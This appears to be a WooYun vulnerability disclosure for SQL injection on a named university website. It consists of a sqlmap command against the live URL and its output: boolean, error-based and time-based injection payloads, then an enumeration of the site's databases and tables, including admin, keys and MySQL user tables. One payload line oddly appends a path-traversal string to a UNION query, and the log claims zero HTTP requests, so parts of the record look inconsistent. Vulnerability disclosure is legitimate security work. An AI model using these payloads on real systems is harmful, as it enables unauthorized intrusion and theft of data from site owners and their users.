WooYun.org

注入点:http://swsj.qtech.edu.cn/middleacc/director.php?id=91
证明:
sqlmap -u "http://swsj.qtech.edu.cn/middleacc/director.php?id=91" --tables
[*] starting at 20:18:48
[20:18:48] [DEBUG] cleaning up configuration parameters
[20:18:48] [DEBUG] setting the HTTP timeout
[20:18:48] [DEBUG] creating HTTP requests opener object
[20:18:48] [INFO] resuming back-end DBMS 'mysql'
[20:18:48] [DEBUG] resolving hostname 'swsj.qtech.edu.cn'
[20:18:48] [INFO] testing connection to the target URL
[20:18:49] [DEBUG] declared web page charset 'utf-8'
[20:18:49] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[20:18:49] [PAYLOAD] QMWv=3481 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=91 AND 8197=8197
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=91 AND (SELECT 4883 FROM(SELECT COUNT(*),CONCAT(0x717a767a71,(SELECT (CASE WHEN (4883=4883) THEN 1 ELSE 0 END)),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=91 AND (SELECT * FROM (SELECT(SLEEP(5)))CewI)
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[20:18:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.5, Apache 2.2.6
back-end DBMS: MySQL 5.0
[20:18:49] [INFO] fetching database names
[20:18:49] [INFO] the SQL query used returns 5 entries
[20:18:49] [INFO] resumed: information_schema
[20:18:49] [INFO] resumed: lgdx
[20:18:49] [INFO] resumed: mysql
[20:18:49] [INFO] resumed: phpmyadmin
[20:18:49] [INFO] resumed: test
[20:18:49] [DEBUG] performed 0 queries in 0.01 seconds
[20:18:49] [INFO] fetching tables for databases: 'information_schema, lgdx, mysql, phpmyadmin, test'
[20:18:49] [INFO] the SQL query used returns 85 entries
[20:18:49] [DEBUG] suppressing possible resume console info because of large number of rows. It might take too long
[20:18:49] [DEBUG] performed 0 queries in 0.02 seconds
Database: test
[1 table]
+---------------------------------------+
| te |
+---------------------------------------+
Database: phpmyadmin
[7 tables]
+---------------------------------------+
| pma_bookmark |
| pma_column_info |
| pma_history |
| pma_pdf_pages |
| pma_relation |
| pma_table_coords |
| pma_table_info |
+---------------------------------------+
Database: lgdx
[43 tables]
+---------------------------------------+
| accinfor_admin_info |
| accinfor_keys |
| accinfor_message |
| accinfor_news |
| accinfor_news_pic |
| accinfor_ppt |
| accinfor_sort |
| auditing_admin_info |
| auditing_keys |
| auditing_message |
| auditing_news |
| auditing_news_pic |
| auditing_ppt |
| auditing_sort |
| lgdx_admin_info |
| lgdx_keys |
| lgdx_links |
| lgdx_message |
| lgdx_news |
| lgdx_news_pic |
| lgdx_ppt |
| lgdx_sort |
| middleacc_admin_info |
| middleacc_keys |
| middleacc_message |
| middleacc_news |
| middleacc_news_pic |
| middleacc_ppt |
| middleacc_sort |
| middleman_admin_info |
| middleman_keys |
| middleman_message |
| middleman_news |
| middleman_news_pic |
| middleman_ppt |
| middleman_sort |
| senioracc_admin_info |
| senioracc_keys |
| senioracc_message |
| senioracc_news |
| senioracc_news_pic |
| senioracc_ppt |
| senioracc_sort |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[17 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
[20:18:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/swsj.qtech.edu.cn'
[*] shutting down at 20:18:49